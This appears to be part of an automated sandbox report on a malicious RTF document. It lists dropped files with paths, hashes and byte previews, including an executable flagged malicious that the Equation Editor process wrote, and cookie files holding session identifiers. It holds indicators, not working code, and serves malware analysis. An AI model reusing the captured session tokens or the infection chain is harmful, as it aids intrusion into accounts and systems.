                                                                                                                                                                                                              SHA1:E4380ED6734D22F26370C376EFACC961F68BD18F
                                                                                                                                                                                                              SHA-256:0A0B4E9918997CF956646F26D70FFDBD897F444F6174053729B7B99DF2E426FD
                                                                                                                                                                                                              SHA-512:463E9802B41B2B24374E72CBED90A658213A2734F28489F56582CB26930123EEFD9FD3B4CFF53BCF563600F2B8EF84CB94A8DD9E443BDFF3AA0AF6E3581B11A7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... .......................................PbHh|G................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~DF8EF78AC34D50EDE9.TMP
                                                                                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13189
                                                                                                                                                                                                              Entropy (8bit):0.5848289940252058
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:LypvPUqIURUXjNt0twGjNhVDaGDaGGDajNhyvGvo:LypvP3I2AwhXaqg
                                                                                                                                                                                                              MD5:9A473137BAF4BEB3ABC2995CD3ABCB4D
                                                                                                                                                                                                              SHA1:01E66AC380A93654197F1BDFA5A2705403547150
                                                                                                                                                                                                              SHA-256:7DC5A3BC5A4B8C445E6CF9F2A31091F6DA713E484DDAF432B96A9A97E6F80B3B
                                                                                                                                                                                                              SHA-512:E97637BA8185C39BDBBD24B774E3E729A64CC937738D330AD90F405A7848E4389FDBDAF90422DCE33EAC30ECF4B045E9C7BEDBBEA3DF11902D40B7D30128DB6D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~DF8F6FB24AE5D2C3F1.TMP
                                                                                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25441
                                                                                                                                                                                                              Entropy (8bit):4.353646014480933
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:LyjjXw0++m27vsjXw0++m2K4ujXw0++m2gwvv0l:90n0z0
                                                                                                                                                                                                              MD5:BC755D46BD88D9C6A69A773388BBB285
                                                                                                                                                                                                              SHA1:7A548D523F1B9E01A9E8CAB792AD703560B0107A
                                                                                                                                                                                                              SHA-256:EC3455C96BF6BB631C36F709CE8312B25EAB60EA998EF3DE973358A57DA8EDD5
                                                                                                                                                                                                              SHA-512:49FCDA036244DF59188EEC716CF21C81CBB11187006B3C1648E2CBFAF07BEF53A7B2B7F959D69CBE79A3DE89739345FFC7A3538205629D86520869AE5B0282D0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ............................................................$/.....u.......................................................................0=/...................................................`.-.....`.-..... ......t..@..J....yrp.j..F2P]a.q.\7/............................M.i.c.r.o.s.o.f.t. .S.S.L. .P.r.o.t.o.c.o.l. .P.r.o.v.i.d.e.r.......0...0............VE.,..@U.`....0...*.H........0M1.0...U....US1.0...U....DigiCert Inc1'0%..U....DigiCert SHA2 Secure Server CA0...201116000000Z..211110235959Z0n1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....*.vo.msecnd.net0.."0...*.H.............0..........Fk..C.R.;....B.Im.....c.UqS.8..H6N.\8~r./..ZbC.,.E.8.6...k...w.y"....Z.A..,..........};./....i1.a>..q.^..p.......h2e..+.."V$...GsmN.4.-......m~V....qs.)......6h...p...P.".7..k...a.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19463448
                                                                                                                                                                                                              Entropy (8bit):5.233180679376348
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:196608:MmtHa+5hH1km/Sf7byFXKEBmih9S5rQ5FNFl001p4Ki:Y+5RB/SDbyFBH9eQD/l00/4
                                                                                                                                                                                                              MD5:AA2AD37BB74C05A49417E3D2F1BD89CE
                                                                                                                                                                                                              SHA1:1BF5F814FFE801B4E6F118E829C0D2821D78A60A
                                                                                                                                                                                                              SHA-256:690C8A63769D444FAD47B7DDECEE7F24C9333AA735D0BD46587D0DF5CF15CDE5
                                                                                                                                                                                                              SHA-512:FAB34CCBEFBCDCEC8F823840C16AE564812D0E063319C4EB4CC1112CF775B8764FEA59D0BBAFD4774D84B56E08C24056FA96F27425C4060E12EB547C2AE086CC
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L...-.-.-..E.-.F.-.F.-.F.-.F.-.-../.F..-.F...-.F.-.Rich.-.........PE..L....JJ..................|...........)............@...................................)...@...... ..........................<.......................X.(..!...0...f...[..T....................M......8M..@...............8............................text...0{.......|.................. ..`.data...p1..........................@....idata...+.......,..................@..@.boxload@...........................@..@.rsrc.... ..........................@..@.reloc...f...0...h.................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\7bYDInO.LNK
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:19 2020, mtime=Wed Aug 26 14:08:19 2020, atime=Wed May 12 21:15:37 2021, length=62896, window=hide
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1994
                                                                                                                                                                                                              Entropy (8bit):4.551746310130312
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:8y1/XT0K6VXbovnD8emDeDv3qkdM7dD2y1/XT0K6VXbovnD8emDeDv3qkdM7dV:86/XT0ZVXbkYTkQh26/XT0ZVXbkYTkQ/
                                                                                                                                                                                                              MD5:1F24DB02806CC853F5BF4E6A514EEBB9
                                                                                                                                                                                                              SHA1:FA905BDEAD240638904264C7A5CC37DAFEFEF68A
                                                                                                                                                                                                              SHA-256:C68645475BF8D02DDD38136BF175C9D95C81002032087FC72949497EDFF3380E
                                                                                                                                                                                                              SHA-512:BE80EC3540EBFF28DD99F5189817BF4903542F377767C05B108E82175EDB23FE3E7EF7F4CF9CD0A3B8C457CC9A12694A805B33807279CA428F87BFF669E0D657
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: L..................F.... ....A..{...A..{...%<V|G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....^.2......R. .7bYDInO.rtf.D.......Q.y.Q.y*...8.....................7.b.Y.D.I.n.O...r.t.f.......u...............-...8...[............?J......C:\Users\..#...................\\138727\Users.user\Desktop\7bYDInO.rtf.".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.7.b.Y.D.I.n.O...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......138727..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                              Entropy (8bit):4.340035395317005
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:H58STSmxW58Sv:H5s9
                                                                                                                                                                                                              MD5:B6CDAFE6E427E0CB7FF108D1AFE85060
                                                                                                                                                                                                              SHA1:0D9AD9F4D2609B040AF7A45E1D107EC7078035DD
                                                                                                                                                                                                              SHA-256:52A6B67E4995FF95AABEBEE663BFC44E8CA78738AE68394C2030543C8407E0CB
                                                                                                                                                                                                              SHA-512:2B0ED4D6184A42D4E5CE72DD6B9359E607ABE0BFF2D276A99A7D97FF7DDC492A4D3E24FAEC7D00868A4E82E941FFCF706E904673D6BABE0E8FB02ACAF82E3CA2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: [misc]..7bYDInO.LNK=0..7bYDInO.LNK=0..[misc]..7bYDInO.LNK=0..
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):162
                                                                                                                                                                                                              Entropy (8bit):2.431160061181642
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                                                                                                                                              MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                                                                                                                                              SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                                                                                                                                              SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                                                                                                                                              SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ..
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\08Y9IRHH.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):431
                                                                                                                                                                                                              Entropy (8bit):5.694587629446184
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:2vCl99H+Hd8Ra4iGQfArp+sIW5UUiPt8+sIW5Uu:2EH+Hd8YfWp+srfQ8+srB
                                                                                                                                                                                                              MD5:73F3C72793DC4C13A01DA2B14C222406
                                                                                                                                                                                                              SHA1:B660DE1792E215449E0816FACA82F71342E74378
                                                                                                                                                                                                              SHA-256:C5B2F125B37FC7465ED962B04061FBE8A829D6653E6E39214A785DE8B0FF6A52
                                                                                                                                                                                                              SHA-512:D91CCC85CF121819FBFB08A504ACC3758E9CF0F995F2FF7C790B598470E6FF3439EEC8F516714CC4766F923F2780E21680323387E2CBF5F7C232F141A35F0530
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:login.microsoftonline.com/
                                                                                                                                                                                                              Preview: buid.0.ATkAMe_N-B6jSkuT5F9XHpElWhkrJ-4RRD9DjyhcE8tv1AcBAAA.AQABAAEAAAD--DLA3VO7QrddgJg7WevrgeP_h0yjh0T-rIuPy1NC0yMXmzKoscb2te4Lf-qNcaA16NYOWVwg1wNnPmsdieKqUHJunW_sTrm80H4n7UtuLFtcQNaf3JmsrhzKk-a37mIgAA.login.microsoftonline.com/.2147492865.2762680064.30891716.364008307.30885757.*.fpc.AthaxQRrb49Njvg67b4XSZhqwEtIAQAAACzMLdgOAAAAP_LF-AEAAABFzS3YDgAAAA.login.microsoftonline.com/.2147492865.2762680064.30891716.364008307.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0LAG969A.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):409
                                                                                                                                                                                                              Entropy (8bit):4.744054073039502
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:vQJldJXVYKdSlRC6svhwJVX6hc2O6XHmaAHmt6CTVrnEuqFnmWTVdcgWV3:vQJpXmhjsvhK9ic2O6RPTVrbqtJTVeTl
                                                                                                                                                                                                              MD5:28E688D7132FD3D01A2D4243900D5359
                                                                                                                                                                                                              SHA1:BC354553D066A7678AAC8FCF439ABE11B3B9EC33
                                                                                                                                                                                                              SHA-256:87A17514E66B6DE01B634E4B38B56BA5BF0B07358B2873C21DAD897233B7CD90
                                                                                                                                                                                                              SHA-512:A29D755ED821DF941AF879062770DE0B54A3EA483F95C76629D5C64F1F0B0AD152D5B67578B9626DF32C013D47BF53BFB2BEAB3A8F97D8D96EADD4ABEEFBB356
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948|PC#e5f0af1807f74eb8b0283f40d170bf39.37_0#1655044786.xbox.com/.1600.1120937216.30965354.647033993.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\10ZLSS0M.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):542
                                                                                                                                                                                                              Entropy (8bit):5.092937560004919
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:fdwVgCTDEXbb9m9RUUAZ+mTDM4CGUvHWTDMQqZFCXw+JjwfeTDMTVeh3n:lw1insRUDzCGUvHmcCg+JKun
                                                                                                                                                                                                              MD5:F5E23B785D6CB4976119FA6FC829251C
                                                                                                                                                                                                              SHA1:297B10F0BC878F3D22A62F6661D276734144EAE0
                                                                                                                                                                                                              SHA-256:54258796535BD8E585DC5D90A83C9C0710DAB6D7C3866E388FD3FDA19F8E67BA
                                                                                                                                                                                                              SHA-512:EF1BB9717C7772F5C4B5D04FD7577FB0DF080A15A2CF92D832F8708C6906C9A83B4F7494AE18298CEBF7B701F9E36BB68CEF07758A7062AE4D2B9FA27A2C225E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:support.microsoft.com/
                                                                                                                                                                                                              Preview: EXPID.26493f44-f65d-403a-b917-a0ea2ea94303.support.microsoft.com/.9217.621635328.30959107.366508345.30885757.*.MicrosoftApplicationsTelemetryDeviceId.2537901c-f6e2-4d47-aabe-716f4e285677.support.microsoft.com/.1089.2379088128.30959182.362008276.30885757.*.ai_session.wx84LX6Z6xYlTnVRXca0Cd|1620857777572|1620858058925.support.microsoft.com/.1089.1172927744.30885761.362008276.30885757.*.MSFPC.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.support.microsoft.com/.1601.2106602624.30959106.1850043162.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\1MT0ADMT.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):905
                                                                                                                                                                                                              Entropy (8bit):4.814162856205267
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:vQJpXmhjsvhK9ic2O6RPTVrbqtJTVeThnsTVwUS8c5NzQTVttslTRHXYjTVi9XJA:vQJNmiprjOos69ljVKylJXYE/0x3
                                                                                                                                                                                                              MD5:49E0EF11A714BB62636B2D3EBD4A660A
                                                                                                                                                                                                              SHA1:9AB87780302079A5216964E6C6E433492D674B3E
                                                                                                                                                                                                              SHA-256:456E79903F53E4AEEEF79974068654D39DCA3A9DD0FE7A412250CC0EE0250512
                                                                                                                                                                                                              SHA-512:665C0995EB722D54CA1B4C22F1079CBF45DAE704C321B4A3F5316AFD7B0DDC73493C15A63D8BFB43EC502329E070C63BB6ECDC9FC9904015CDC90C22656DFCBA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948|PC#e5f0af1807f74eb8b0283f40d170bf39.37_0#1655044786.xbox.com/.1600.1120937216.30965354.647033993.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*._cs_c.0.xbox.com/.1601.1804203904.30965301.686504450.30885757.*.__CT_Data.gpv=1&ckp=tld&dm=xbox.com&apv_1002_www32=1&cpv_1002_www32=1.xbox.com/.1600.2719088128.30959182.696538469.30885757.*._cs_id.5bfeb22c-810a-af41-b542-7da132b42761.1620858092.1.1620858092.1620858092.1613561419.1655022092366.None.1.xbox.com/.1601.1814203904.30965301.696538469.30885757.*._cs_s.1.1.xbox.com/.1601.1512927744.30885761.696538469.30885757.*._CT_RS_.Recording.xbox.com/.1600.575165568.30891792.707082527.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\3UVJB2JQ.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):546
                                                                                                                                                                                                              Entropy (8bit):5.087186391047799
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:fdwVgCTDEXbwIhssUUAZ+mTDMTV3G0vRmjFUvHxTDMTVSQ4Cvw+JjwfeTDMTVehX:lw1iNUDuzmjFUvH9JCo+JKun
                                                                                                                                                                                                              MD5:95B1B83596CD78EE6C9329609481C0FF
                                                                                                                                                                                                              SHA1:A4F0428CA80589F071C0BDE27E7AD7C846119FF3
                                                                                                                                                                                                              SHA-256:5082654518041BE8CCA20D28EF4E8ADC4787339B6C932B77ADBC48C7F5ADBF97
                                                                                                                                                                                                              SHA-512:1ADC47CDB8E81AB79ABB4C78E01EABC25B2DEDDB4138086BA07A30790B9A007D2B0F912BAEC64B87E5A38E4212B809839DFB6587D6027742567522EE24F0F5FF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: EXPID.26493f44-f65d-403a-b917-a0ea2ea94303.support.microsoft.com/.9217.2036602624.30959106.1782963044.30885756.*.MicrosoftApplicationsTelemetryDeviceId.2537901c-f6e2-4d47-aabe-716f4e285677.support.microsoft.com/.1601.3864055424.30959181.1843023150.30885756.*.ai_session.wx84LX6Z6xYlTnVRXca0Cd|1620857777572|1620857777572.support.microsoft.com/.1601.2657895040.30885760.1843491151.30885756.*.MSFPC.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.support.microsoft.com/.1601.2106602624.30959106.1850043162.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4HNZ1ZXS.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):433
                                                                                                                                                                                                              Entropy (8bit):5.111702823342243
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:zUUAZ+mTDMTV3G0vRmjFUvHxTDMTVSQ4Cvw+JjwfeTDMTVeh3n:zUDuzmjFUvH9JCo+JKun
                                                                                                                                                                                                              MD5:600D089B78BE1DA626109E572B842BF8
                                                                                                                                                                                                              SHA1:8EF86F0E0A13BC04EF1C33A75274F9C4C3D2D5ED
                                                                                                                                                                                                              SHA-256:208FAB23586CBD9FB8652EC6F801DF1C4BB1F7E43239E770078005DA3338D207
                                                                                                                                                                                                              SHA-512:3FE26460ACED137D76B301DCD385174D6E17DE663D958FC015FE280614C98F0C0ADF96F9F51FEA54725820AC1B5F39D663F732027EBF165D7886F920426F1386
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MicrosoftApplicationsTelemetryDeviceId.2537901c-f6e2-4d47-aabe-716f4e285677.support.microsoft.com/.1601.3864055424.30959181.1843023150.30885756.*.ai_session.wx84LX6Z6xYlTnVRXca0Cd|1620857777572|1620857777572.support.microsoft.com/.1601.2657895040.30885760.1843491151.30885756.*.MSFPC.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.support.microsoft.com/.1601.2106602624.30959106.1850043162.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\6XMCZVB8.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):226
                                                                                                                                                                                                              Entropy (8bit):4.920108146515511
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:3uA20vMXwXtNxXcdSucw+JjwXeJTVAWLtNwj0:vvMXwllw+JjwcTVzLsY
                                                                                                                                                                                                              MD5:755300BF3B2E8BD999C8F822C32C8486
                                                                                                                                                                                                              SHA1:C3404AB954F59B9513C8D5312B13CABA5866CA64
                                                                                                                                                                                                              SHA-256:4C47D5F70D509AF26419523D544578F82B9DF69AB09EDE48DC8BC10085F83100
                                                                                                                                                                                                              SHA-512:04253A9D8F7A9EF5644FA53293DBB79DD453E0BBA5175B145FCA9645BE2FC06965745A19E5D372D54E2A37192E77277D08F4E114C76744F10C10158EBCAEAE9D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: mobileOverride.desktop.www.xbox.com/.1536.871635328.30959107.625525913.30885757.*.MSFPC.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.www.xbox.com/.1601.901635328.30959107.645996981.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\7TLBVSBM.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):542
                                                                                                                                                                                                              Entropy (8bit):5.092454718865688
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:fdwVgCTDEXb55UUAZ+mTDM4CGUvHWTDMQqZFCXw+JjwfeTDMTVeh3n:lw1iV5UDzCGUvHmcCg+JKun
                                                                                                                                                                                                              MD5:88909FE69A9EB490A5BE6C8FD9258AF9
                                                                                                                                                                                                              SHA1:5F849E380EDF7AE7121A150388A25B2E5D3D4F0B
                                                                                                                                                                                                              SHA-256:38DB29E2A9B5F6FD0ECAD5E40DEA46CDEDA66ECCDAAB570EA6B74E990E5632D9
                                                                                                                                                                                                              SHA-512:A80EA2B55AD6BE75016C4DAC66E2CBFD6D43D334B041B3CFE214EC506D77815A92CE23A4E2C13E3FC00FC66F153BE6CD5DF5514AF684E76A2FF7C600C918777E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: EXPID.26493f44-f65d-403a-b917-a0ea2ea94303.support.microsoft.com/.9217.611635328.30959107.359068263.30885757.*.MicrosoftApplicationsTelemetryDeviceId.2537901c-f6e2-4d47-aabe-716f4e285677.support.microsoft.com/.1089.2379088128.30959182.362008276.30885757.*.ai_session.wx84LX6Z6xYlTnVRXca0Cd|1620857777572|1620858058925.support.microsoft.com/.1089.1172927744.30885761.362008276.30885757.*.MSFPC.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.support.microsoft.com/.1601.2106602624.30959106.1850043162.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\8MWNU0TR.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):732
                                                                                                                                                                                                              Entropy (8bit):4.770588740460131
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:vQJpXmhjsvhK9ic2O6RPTVrbqtJTVeThnsTVwUS8c2TVtucslTRHXYjTVi9r:vQJNmiprjOos69liuZlJXYw
                                                                                                                                                                                                              MD5:1E7FABF59F5213A91DE811B9D36436A9
                                                                                                                                                                                                              SHA1:3721CAA2468A4C2C0A254F084D173D4921A9A7C5
                                                                                                                                                                                                              SHA-256:54588D3A4837A4AD184AE5DF36FB82BE5AC40621A970BD15841D2176AD334BA2
                                                                                                                                                                                                              SHA-512:37FF5E36E4A832406EE718E26C0FFB028BE745246263DC6FFEA24F74AAED8C2981146562B520464CB0B98E6B796673346ACF568AC3ACA58804B50C9247FBFDDF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948|PC#e5f0af1807f74eb8b0283f40d170bf39.37_0#1655044786.xbox.com/.1600.1120937216.30965354.647033993.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*._cs_c.0.xbox.com/.1601.1804203904.30965301.686504450.30885757.*.__CT_Data.gpv=1&ckp=tld&dm=xbox.com.xbox.com/.1600.2719088128.30959182.696070468.30885757.*._cs_id.5bfeb22c-810a-af41-b542-7da132b42761.1620858092.1.1620858092.1620858092.1613561419.1655022092366.None.1.xbox.com/.1601.1814203904.30965301.696538469.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\9S927G54.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):121
                                                                                                                                                                                                              Entropy (8bit):4.507929582116536
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:mvnTnYPvWY2p3Mr3RP3Itd3Pv6NlnSZt2/Ty6fQ0n:Yn0PUp3414tR6ctYNQ0
                                                                                                                                                                                                              MD5:5F3A5BCE79EDC2E8A094F3CCCC9AA28F
                                                                                                                                                                                                              SHA1:479E81A0077191C4DA105DE051AC407A7F8FA39C
                                                                                                                                                                                                              SHA-256:35D584D5716D51DE03060A3B2D2722D9505D2B82BD381D343D16ECA7AC433B1F
                                                                                                                                                                                                              SHA-512:DA6F10F8F1C0FA4149D33BBCBD3CE0C8722F5AAF93B45A8D08786A76C1903547ADD6CDCC2B6BE346C54079D4107E7197F4CB4578F5275E562D329CB4AD35EA45
